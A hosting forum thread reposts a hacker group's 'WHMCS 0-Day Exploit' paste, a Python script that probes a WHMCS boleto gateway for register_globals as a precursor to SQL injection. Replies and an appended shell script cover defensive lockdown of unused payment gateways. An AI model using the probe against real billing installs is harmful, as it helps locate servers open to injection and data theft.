WHMCS 0-Day Exploit #UGNazi


Status
Not open for further replies.

voezie

Hosting Guru
Source: WHMCS 0-Day Exploit #UGNazi - Pastebin.com

============================|Twitter.com/UG|=======================

---> Joshthegod > MrOsama > Cosmo > CyberZeist <---


"**** With The Best , Die Like The Rest"

Twitter.com/Ug
Twitter.com/Joshthegod
Twitter.com/Cosmothegod
Twitter.com/le4ky

==============================================================================

#UGNazi #Mybb #UGNaziwhmcs #Whmcs #fuckskids #hack #joshthegod #UG #Cosmothegod #MrOsama #dox

==============================================================================


########################################
# UGNazi 0 Day WHMCS Exploit
#######################################
import urllib2
import urllib
import os


def regglobcheck():
    # Request the boleto gateway script with a marker value in the query string
    regglob1 = urllib2.Request('http://127.0.0.1/whmcs/whmcs_v451/whmcs/modules/gateways/boleto/boleto_bb.php?dadosboleto[identificacao]=test')
    regglob2 = urllib2.urlopen(regglob1)
    # Count how many times the marker is echoed back in the response body
    regglob3 = regglob2.read().count('test')
    if regglob3 == 0:
        rgen = 0
        print " [+] Register Globals not enabled, no sqli on this whmcs install"
    elif regglob3 >= 1:
        rgen = 1
        print " [+] Register Globals enabled, own it."


regglobcheck()
 

cpserv

Expert 1.0
That's why there was a patch update the other day, to close that boleto hole.. but I usually turn off whatever I don't use anyway, for example I chmod all gateways to 000 except paypal and payza/alertpay, because those two are the only ones in use. :D
 

hostguin

Expert 1.0
Setting chmod 000 gives a blank page on the gateway page :D

For payment gateways specifically, chmod 000 will definitely give a blank page. The way to do it: create a folder, move everything into that new folder, and leave only index.php and the modules in use. Setting the folder itself to chmod 000 is also OK. Deleting them outright works too :)

For other modules such as registrar or server, chmod-ing them is no problem.
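
The lockdown described in the replies above (keep index.php and the gateways in use, move everything else into a folder and chmod that folder to 000), as an added shell example that is not part of the original thread. The `_disabled` folder name and the arguments in the usage comment are assumptions; pass your own gateways directory and list of modules to keep.

```shell
#!/bin/sh
# Added example, not from the thread.
# quarantine_gateways DIR KEEP...
#   DIR   gateways directory of the install (you supply the path)
#   KEEP  names of gateway modules in use, without ".php" (e.g. paypal);
#         a name matches both NAME.php and a directory called NAME
# Prints the number of entries moved into the quarantine folder.
quarantine_gateways() {
    dir=$1
    shift
    keep=" index $* "               # index.php always stays in place
    qdir="$dir/_disabled"           # hypothetical quarantine folder name

    [ -d "$dir" ] || { echo "no such directory: $dir" >&2; return 1; }

    # Make the folder writable first so the function can be re-run later.
    mkdir -p "$qdir" || return 1
    chmod 700 "$qdir" || return 1

    moved=0
    for path in "$dir"/*; do
        [ -e "$path" ] || continue          # empty directory: glob did not expand
        name=$(basename "$path")
        [ "$name" = "_disabled" ] && continue
        base=${name%.php}
        case "$keep" in
            *" $base "*) continue ;;        # in use: leave it where it is
        esac
        mv -- "$path" "$qdir"/ && moved=$((moved + 1))
    done

    # No read, write or traverse for anyone: files inside are unreachable.
    chmod 000 "$qdir" || return 1
    echo "$moved"
}

# Usage: sh quarantine.sh /path/to/modules/gateways paypal payza
if [ "$#" -gt 0 ]; then
    quarantine_gateways "$@"
fi
```

Run it as the account that owns the files, not as the web server user. Mode 000 does not restrict root, so deleting the unused modules remains the stricter option.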
 